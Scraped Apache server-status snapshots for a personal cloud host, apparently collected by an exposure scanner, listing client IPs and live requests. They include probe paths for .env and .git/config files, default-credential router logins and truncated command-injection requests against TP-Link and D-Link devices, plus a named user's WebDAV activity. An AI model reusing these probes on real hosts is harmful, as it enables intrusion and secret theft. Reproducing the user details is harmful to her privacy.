Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-18620437610/5/3317_ 0.60656535777160.00.0272.93 101.36.108.9http/1.1localhost:80GET / HTTP/1.1 0-18620437610/2/3328_ 0.399531765540930.00.0249.86 3.90.115.5http/1.1 0-18620437610/7/3414_ 0.501856305817890.00.0270.58 31.220.1.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-18620437610/4/3366_ 0.52755025830980.00.0476.25 165.154.6.224http/1.1 0-18620437610/4/3371_ 0.60755125810720.00.0482.07 165.154.6.224http/1.1localhost:80GET / HTTP/1.1 0-18620437610/2/3463_ 0.43953125997380.00.0078.63 3.90.115.5http/1.1 0-18620437610/1/3411_ 0.1695312775884510.00.0240.13 3.90.115.5http/1.1 0-18620437610/3/3414_ 0.6252205770920.00.0178.43 87.121.69.52http/1.1localhost:80CONNECT google.com:443 HTTP/1.1 0-18620437610/2/3366_ 0.55045902840.00.0362.93 15.235.13.140http/1.1ravignon.mycloud.paris:443GET /wp-login.php HTTP/1.1 0-18620437610/4/3413_ 0.581090956090270.00.0298.24 185.242.226.7http/1.1ravignon.mycloud.paris:443GET /core/img/favicon.ico HTTP/1.1 0-18620437610/6/3364_ 0.5452205787010.00.0550.48 87.121.69.52http/1.1 0-18620437610/2/3366_ 0.60755013615813570.00.0052.48 165.154.6.224http/1.1localhost:80\x16\x03\x01 0-18620437610/2/3455_ 0.406565616236550.00.0267.56 172.104.137.47http/1.1 0-18620437610/5/3359_ 0.62465625990730.00.0358.30 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-18620437610/5/3387_ 0.620705956630.00.0234.90 157.230.19.140http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-18620437610/6/3465_ 0.53754946159460.00.0565.38 185.242.226.10http/1.1localhost:80GET / HTTP/1.1 0-18620437610/3/3373_ 0.429531645933050.00.0467.98 3.90.115.5http/1.1 0-18620437610/4/3340_ 0.61656415782090.00.0292.44 101.36.108.9http/1.1localhost:80GET /robots.txt HTTP/1.1 0-18620437611/1/3316W 0.50005678570.00.0066.92 157.230.19.140http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-18620437610/2/3316_ 0.54656005954960.00.0055.19 64.226.106.105http/1.1localhost:80GET /odinhttpcall1716739272 HTTP/1.1 0-18620437610/4/3382_ 0.61656005755300.00.0147.33 101.36.108.9http/1.1localhost:80GET /axis2-admin/ HTTP/1.1 0-18620437610/4/3338_ 0.61656005903880.00.0043.94 101.36.108.9http/1.1localhost:80GET /axis2/ HTTP/1.1 0-18620437610/7/3304_ 0.54655905638450.00.0350.68 64.226.106.105http/1.1localhost:80GET / HTTP/1.0 0-18620437610/2/3358_ 0.501090905716260.00.0168.01 185.242.226.7http/1.1 0-18620437610/1/3403_ 0.25465605970560.00.0085.97 57.129.23.166http/1.1 1-185-0/0/4050. 0.007177917037850.00.0062.72 109.107.82.104http/1.1localhost:80GET / HTTP/1.0 1-185-0/0/4064. 0.00717791317183680.00.0083.15 57.129.23.166http/1.1 1-185-0/0/4060. 0.007177916486760.00.0059.95 123.160.221.133http/1.1 1-185-0/0/4157. 0.00717791597111460.00.0045.37 165.227.84.14http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-185-0/0/4086. 0.00717791627113640.00.0065.57 165.227.84.14http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-185-0/0/4054. 0.0071779637154000.00.0074.89 96.126.110.54http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-185-0/0/4079. 0.007177936934690.00.0047.39 185.242.226.7http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 1-185-0/0/4136. 0.007177907114430.00.00111.47 45.142.182.121http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-185-0/0/4116. 0.0071779996861970.00.0067.64 96.126.110.54http/1.1ravignon.mycloud.paris:443GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-185-0/0/4078. 0.007177927121460.00.0040.18 176.98.50.14http/1.1localhost:80GET / HTTP/1.1 1-185-0/0/4047. 0.00717791676538890.00.0081.50 165.227.84.14http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 1-185-0/0/4006. 0.00717791547094050.00.0082.12 87.236.176.45h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-185-0/0/4130. 0.00717792207099000.00.0075.76 176.98.50.14http/1.1 1-185-0/0/4025. 0.0071779946780810.00.0058.05 57.129.23.166http/1.1 1-185-0/0/4058. 0.007177916913680.00.0054.08 43.131.37.227http/1.1 1-185-0/0/3996. 0.007177906836000.00.0078.41 43.131.37.227h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-185-0/0/4063. 0.007177906928800.00.0074.80 43.131.37.227http/1.1 1-185-0/0/3970. 0.00717791516577810.00.0069.62 165.227.84.14http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 1-185-0/0/4018. 0.00717792996761270.00.0080.12 165.227.84.14http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-185-0/0/3948. 0.0071779849649810.00.0063.98 96.126.110.54http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-185-0/0/4087. 0.00717791856846830.00.0085.25 87.236.176.38h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-185-0/0/4007. 0.00717791717166300.00.0091.02 185.180.143.8http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-185-0/0/4073. 0.00717791857010200.00.0082.74 167.94.145.108http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-185-0/0/4003. 0.007177907182390.00.0044.08 89.58.26.216http/1.1localhost:80GET / HTTP/1.1 1-185-0/0/4071. 0.007177926905480.00.0067.89 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 2-185-0/0/1329. 0.00717791412313610.00.0011.90 165.227.84.14http/1.1ravignon.mycloud.paris:443GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805e4682c78
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Saturday, 25-May-2024 14:01:37 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 186 Parent Server MPM Generation: 185 Server uptime: 183 days 7 hours 1 minute 57 seconds Server load: 0.00 0.00 0.00 Total accesses: 303548 - Total Traffic: 6.1 GB - Total Duration: 53840938 CPU Usage: u532.53 s1046.32 cu2232.64 cs719.54 - .0286% CPU load .0192 requests/sec - 414 B/second - 21.1 kB/request - 177.372 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12039610no0yes025000 22039611no0yes124000 Sum200 149000 ........................._______________________________________ _______W___..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-184-0/0/3312. 0.005049417455776260.00.0072.91 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /public/.git/config HTTP/1.1 0-184-0/0/3326. 0.005049419035540150.00.0049.84 13.91.180.110http/1.1 0-184-0/0/3407. 0.005049421885817860.00.0070.56 54.36.115.221http/1.1 0-184-0/0/3362. 0.005049405829830.00.0076.21 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 0-184-0/0/3367. 0.005049415809610.00.0082.03 98.153.5.114http/1.1localhost:80GET / HTTP/1.1 0-184-0/0/3461. 0.005049435997360.00.0078.62 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 0-184-0/0/3410. 0.00504941365881730.00.0040.11 167.71.81.114http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 0-184-0/0/3411. 0.005049415770870.00.0078.42 205.210.31.83http/1.1localhost:80GET / HTTP/1.0 0-184-0/0/3364. 0.005049415901100.00.0062.90 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 0-184-0/0/3409. 0.005049418216089130.00.0098.23 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /scripts/.git/config HTTP/1.1 0-184-0/0/3358. 0.005049411565782500.00.0050.43 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /config/.git/config HTTP/1.1 0-184-0/0/3364. 0.005049413615813570.00.0052.48 98.153.5.114http/1.1 0-184-0/0/3453. 0.005049406235930.00.0067.54 64.227.41.39http/1.1localhost:80GET /Pages/log/ HTTP/1.1 0-184-0/0/3354. 0.005049415988180.00.0058.27 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-184-0/0/3382. 0.00504945925954210.00.0034.88 34.234.97.48http/1.1 0-184-0/0/3459. 0.005049413336158690.00.0065.33 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /blog/.git/config HTTP/1.1 0-184-0/0/3370. 0.005049411425926560.00.0067.93 57.129.23.166http/1.1 0-184-0/0/3336. 0.0050494145780320.00.0092.42 182.40.104.255http/1.1localhost:80GET / HTTP/1.1 0-184-0/0/3315. 0.005049421125678560.00.0066.92 64.227.41.39http/1.1 0-184-0/0/3314. 0.005049414555954960.00.0055.19 115.231.78.12http/1.1 0-184-0/0/3378. 0.005049415295753490.00.0047.32 54.36.115.221http/1.1 0-184-0/0/3334. 0.0050494905903870.00.0043.94 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-184-0/0/3297. 0.005049419425638400.00.0050.65 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /live/.git/config HTTP/1.1 0-184-0/0/3356. 0.005049417935716240.00.0068.00 54.36.115.221http/1.1 0-184-0/0/3402. 0.005049405970560.00.0085.97 203.55.81.13http/1.1localhost:80GET /api/.env HTTP/1.1 1-18520396100/2/4050_ 0.64017037850.00.0362.72 109.107.82.104http/1.1localhost:80GET / HTTP/1.0 1-18520396100/3/4063_ 0.521192607182370.00.0283.15 167.94.145.107h2clocalhost:80[0/0] done 1-18520396100/3/4059_ 0.67464006486740.00.0359.95 103.228.37.56http/1.1localhost:80GET /.most/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&syste 1-18520396100/0/4155_ 0.00137109870.00.0045.35 168.76.20.229h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-18520396100/5/4084_ 0.700677112010.00.0565.55 96.126.110.54http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-18520396100/3/4054_ 0.710637154000.00.0174.89 96.126.110.54http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-18520396100/3/4078_ 0.67463906934660.00.0147.38 103.228.37.56http/1.1localhost:80GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&syste 1-18520396100/2/4135_ 0.53691737114430.00.01111.47 223.244.35.77http/1.1localhost:80GET / HTTP/1.1 1-18520396100/2/4115_ 0.65691746860980.00.0067.64 115.55.240.50http/1.1localhost:80GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0 1-18520396100/1/4076_ 0.66619627121440.00.0140.17 78.102.11.61http/1.1localhost:80GET / HTTP/1.1 1-18520396100/1/4046_ 0.64016537220.00.0181.48 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-18520396100/3/4005_ 0.4812884637092510.00.0582.12 64.226.101.192http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-18520396100/2/4130_ 0.2761912207099000.00.0875.76 78.102.11.61http/1.1 1-18520396100/3/4024_ 0.64866216779860.00.0158.05 178.175.130.253http/1.1localhost:80GET / HTTP/1.1 1-18520396100/1/4057_ 0.32463906913660.00.0054.08 103.228.37.56http/1.1 1-18520396100/2/3996_ 0.67463906836000.00.0078.41 103.228.37.56http/1.1localhost:80GET /.most/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system= 1-18520396100/4/4063_ 0.5113506928800.00.0074.80 162.142.125.118http/1.1 1-18520396100/0/3969_ 0.001288406576290.00.0069.60 167.94.138.113h2clocalhost:80[0/0] done 1-18520396100/0/4016_ 0.00313456756860.00.0080.08 96.126.110.54h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-18520396100/4/3948_ 0.701849649810.00.0163.98 96.126.110.54http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-18520396100/3/4086_ 0.521192616844970.00.0385.25 167.94.145.107h2clocalhost:80[0/0] init 1-18520396100/2/4006_ 0.67464007164580.00.2990.99 103.228.37.56http/1.1localhost:80GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&sys 1-18520396100/2/4071_ 0.38119261757008350.00.0382.72 167.248.133.49http/1.1 1-18520396100/2/4001_ 0.50865717182360.00.0244.07 87.121.69.52http/1.1 1-18520396100/1/4069_ 0.2486621186905440.00.0167.89 178.175.130.253http/1.1 2-18520396110/3/1326_ 0.5213302312190.00.0311.88 162.142.125.118http/1.1 2-18520396110/1/1355_ 0.951321
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805b8c97252
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Friday, 24-May-2024 11:45:57 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 185 Parent Server MPM Generation: 184 Server uptime: 182 days 4 hours 46 minutes 18 seconds Server load: 0.00 0.00 0.00 Total accesses: 302774 - Total Traffic: 6.1 GB - Total Duration: 53575271 CPU Usage: u540.26 s1043.65 cu2216.5 cs714.39 - .0287% CPU load .0192 requests/sec - 416 B/second - 21.2 kB/request - 176.948 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12035485no0yes025000 22035540no0yes124000 32035069no0yes025000 Sum300 174000 ........................._________________________W_____________ ____________________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-184-0/0/3312. 0.003486217455776260.00.0072.91 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /public/.git/config HTTP/1.1 0-184-0/0/3326. 0.003486219035540150.00.0049.84 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /php/.git/config HTTP/1.1 0-184-0/0/3407. 0.003486221885817860.00.0070.56 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /log/.git/config HTTP/1.1 0-184-0/0/3360. 0.003486218505802420.00.0076.19 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /plugins/.git/config HTTP/1.1 0-184-0/0/3366. 0.003486214175809600.00.0082.02 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /node_modules/.git/config HTTP/1.1 0-184-0/0/3460. 0.003486221845997320.00.0078.62 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /m/.git/config HTTP/1.1 0-184-0/0/3409. 0.003486221735880370.00.0040.09 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /modules/.git/config HTTP/1.1 0-184-0/0/3410. 0.003486225515770860.00.0078.41 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /new/.git/config HTTP/1.1 0-184-0/0/3363. 0.003486219345901090.00.0062.90 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /old-cuburn/.git/config HTTP/1.1 0-184-0/0/3409. 0.003486218216089130.00.0098.23 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /scripts/.git/config HTTP/1.1 0-184-0/0/3358. 0.003486211565782500.00.0050.43 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /config/.git/config HTTP/1.1 0-184-0/0/3364. 0.003486213615813570.00.0052.48 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /info/.git/config HTTP/1.1 0-184-0/0/3452. 0.003486215106235930.00.0067.54 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /qa/.git/config HTTP/1.1 0-184-0/0/3353. 0.003486225285988160.00.0058.27 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /templates/.git/config HTTP/1.1 0-184-0/0/3382. 0.00348625925954210.00.0034.88 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /bin/.git/config HTTP/1.1 0-184-0/0/3459. 0.003486213336158690.00.0065.33 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /blog/.git/config HTTP/1.1 0-184-0/0/3370. 0.003486211425926560.00.0067.93 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /blogs/.git/config HTTP/1.1 0-184-0/0/3335. 0.00348629315780170.00.0092.42 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /cms/.git/config HTTP/1.1 0-184-0/0/3315. 0.003486221125678560.00.0066.92 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /private/.git/config HTTP/1.1 0-184-0/0/3314. 0.003486214555954960.00.0055.19 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /prod.git/config HTTP/1.1 0-184-0/0/3378. 0.003486215295753490.00.0047.32 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /images/.git/config HTTP/1.1 0-184-0/0/3333. 0.00348628505902960.00.0043.91 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /components/.git/config HTTP/1.1 0-184-0/0/3297. 0.003486219425638400.00.0050.65 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /live/.git/config HTTP/1.1 0-184-0/0/3356. 0.003486217935716240.00.0068.00 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /lib/.git/config HTTP/1.1 0-184-0/0/3401. 0.003486219555970560.00.0085.97 83.147.52.37http/1.1ravignon.mycloud.paris:443GET /includes/.git/config HTTP/1.1 1-18420354850/14/4043_ 4.62254676997590.00.1262.65 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-18420354850/11/4052_ 4.524291577158810.00.0783.06 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-18420354850/17/4050_ 4.54310616454370.00.1359.87 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-18420354850/15/4147_ 4.48249637066540.03.0345.28 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-18420354850/17/4075_ 4.593746607085250.00.1265.47 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-18420354850/13/4044_ 4.62195717112450.00.1074.82 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-18420354850/14/4072_ 4.552796226904890.00.1147.33 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-18420354850/6/4126_ 4.42701477086480.00.07111.41 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-18420354850/21/4107_ 4.533692046833500.00.1567.58 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-18420354850/10/4068_ 4.473101537091590.00.0740.10 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-18420354850/13/4039_ 4.60315616510080.00.1081.41 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-18420354850/18/3994_ 4.612841867057580.00.1482.02 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-18420354850/16/4122_ 4.533691687072130.00.1375.64 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-18420354850/15/4014_ 4.58434716753240.00.1157.99 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-18420354850/21/4050_ 4.62255716882440.00.1754.02 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-18420354850/17/3987_ 4.342491536797000.00.1278.34 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-18420354850/18/4052_ 4.57189876886770.00.1374.73 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-18420354850/20/3961_ 4.6475636557040.00.1469.54 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-18420354850/19/4009_ 4.57189676737890.00.1280.01 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-18420354850/15/3938_ 4.36549639626320.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c480505c27244
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Thursday, 23-May-2024 11:52:32 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 184 Parent Server MPM Generation: 183 Server uptime: 181 days 4 hours 52 minutes 53 seconds Server load: 0.11 0.03 0.01 Total accesses: 298549 - Total Traffic: 5.5 GB - Total Duration: 52386794 CPU Usage: u532.18 s1036.84 cu2173.57 cs693.18 - .0283% CPU load .0191 requests/sec - 374 B/second - 19.2 kB/request - 175.471 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02030620no0yes025000 32030619no0yes124000 Sum200 149000 _________________________....................................... ...........____________W____________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-18320306200/25/3276_ 3.9674875567130.00.1467.38 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/23/3280_ 3.88165805422430.00.1343.11 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/27/3369_ 3.8614705711630.00.1565.18 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-18320306200/24/3317_ 3.98141785710420.00.1469.63 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-18320306200/22/3325_ 3.94134635730370.00.0977.70 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/28/3418_ 4.02109655863500.00.1974.40 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/25/3364_ 3.872241215775260.00.1239.31 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-18320306200/26/3371_ 4.0319805681400.00.1476.07 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/23/3324_ 3.98229755792340.00.1355.92 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/17/3365_ 3.68224885903320.00.0773.72 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/21/3311_ 3.98170595711680.00.1347.22 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-18320306200/22/3313_ 4.001391955677010.00.1248.95 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/32/3406_ 3.941345856110170.00.1756.05 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-18320306200/22/3311_ 3.68165595864580.00.1255.26 156.218.39.172http/1.1 0-18320306200/21/3341_ 4.011095915869430.00.1133.87 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-18320306200/29/3416_ 3.90104535969220.00.1656.58 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-18320306200/25/3326_ 3.95104765815110.00.1567.44 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-18320306200/21/3291_ 3.9745905686710.00.1281.48 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/18/3274_ 4.011095955575280.00.1356.09 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-18320306200/20/3275_ 3.77104875851760.00.1254.72 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/24/3332_ 3.95104845644140.00.1744.91 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/16/3294_ 3.9674665724370.00.1036.21 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-18320306200/25/3251_ 3.8645725553640.00.1350.33 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/23/3305_ 4.0279895588090.00.1355.05 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-18320306200/27/3358_ 4.0250615824250.00.1682.61 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-168-0/0/4029. 0.00125235106956830.00.0062.53 54.36.115.221http/1.1 1-168-0/0/4041. 0.00125235107115740.00.0082.99 183.81.169.139http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-168-0/0/4033. 0.0012523511266412390.00.0059.74 64.227.42.11http/1.1 1-168-0/0/4132. 0.0012523511366995710.00.0042.25 167.94.146.49http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-168-0/0/4058. 0.0012523511177016850.00.0065.35 44.220.185.206http/1.1 1-168-0/0/4031. 0.00125235107068650.00.0074.72 64.227.42.11http/1.1 1-168-0/0/4058. 0.00125235106852480.00.0047.21 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-168-0/0/4120. 0.00125235137054110.00.00111.35 185.224.128.43http/1.1localhost:80GET / HTTP/1.1 1-168-0/0/4086. 0.00125235116779510.00.0067.43 167.94.146.49http/1.1 1-168-0/0/4058. 0.0012523512477044240.00.0040.04 167.94.146.49http/1.1 1-168-0/0/4026. 0.00125235106459250.00.0081.32 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-168-0/0/3976. 0.00125235137016230.00.0081.87 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 1-168-0/0/4106. 0.00125235107017150.00.0075.51 103.92.155.19http/1.1 1-168-0/0/3999. 0.00125235106709420.00.0057.88 78.153.140.177http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-168-0/0/4029. 0.0012523512026820250.00.0053.85 78.153.140.177http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-168-0/0/3970. 0.00125235116735910.00.0078.22 54.36.115.221http/1.1 1-168-0/0/4034. 0.00125235106837010.00.0074.60 64.227.42.11h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-168-0/0/3941. 0.0012523511096465570.00.0069.40 94.156.8.73http/1.1ravignon.mycloud.paris:443POST /portal HTTP/1.1 1-168-0/0/3990. 